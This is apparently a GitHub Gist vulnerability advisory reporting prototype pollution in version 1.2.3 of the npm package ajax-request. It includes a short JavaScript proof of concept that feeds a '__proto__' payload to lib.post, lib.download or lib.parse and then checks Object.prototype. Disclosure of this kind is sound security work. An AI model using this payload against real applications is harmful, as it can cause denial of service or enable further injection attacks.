Skip to content

Instantly share code, notes, and snippets.

@tariqhawis
Created December 10, 2024 20:01
Show Gist options
  • Save tariqhawis/c432b93ee7d967c2e65bc1bf39241664 to your computer and use it in GitHub Desktop.
Save tariqhawis/c432b93ee7d967c2e65bc1bf39241664 to your computer and use it in GitHub Desktop.
Advisory for ajax-request

Vulnerability type: Prototype Pollution

Affected Package:

  • Product: ajax-request
  • Version: 1.2.3

Vulnerability Location(s):

node_modules/ajax-request/index.js

Description:

The latest version of ajax-request (1.2.3) is vulnerable to Prototype Pollution through the entry function(s) lib.post,lib.download,lib. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

(async () => {
const lib = await import('ajax-request');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for multiple functions, uncomment only one for each execution.
lib.post (JSON.parse('{"__proto__":{"pollutedKey":123}}'))
//lib.download (JSON.parse('{"__proto__":{"pollutedKey":123}}'))
//lib.parse('{"__proto__":{"pollutedKey":123}}'))
} catch (e) { }
console.log("After Attack: ", JSON.stringify({}.__proto__));
delete Object.prototype.pollutedKey;
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment